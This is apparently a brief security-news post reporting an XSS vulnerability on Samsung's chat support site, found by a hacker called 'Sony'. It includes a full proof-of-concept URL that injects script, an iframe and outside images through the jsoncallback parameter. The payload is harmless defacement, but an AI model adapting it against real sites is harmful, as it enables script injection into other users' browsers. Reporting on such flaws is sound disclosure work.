XSS(Cross Site Scripting) Vulnerability found in Samsung.com
A Hacker named as "Sony" found XSS vulnerability in Samsung website. According to his report, the http://chat.support.samsung.com is vulnerable to XSS Attack.
Screenshot of Vulnerability:
Screenshot of Vulnerability:
POC:
http://chat.support.samsung.com/LiveChat/chkCIC?site_cd=AE&jsoncallback=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Cheers%20to%20a%20new%20year%20and%20another%20chance%20for%20us%20to%20get%20it%20right.%20By%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/45wmyMgyZuY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_santa_claus/santa_claus_78.gif%20align=center%3E%3Cimg%20src=http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%20align=center%3E
The original post can be found here. Few months back, he found the XSS vulnerability in Adobe Profile page.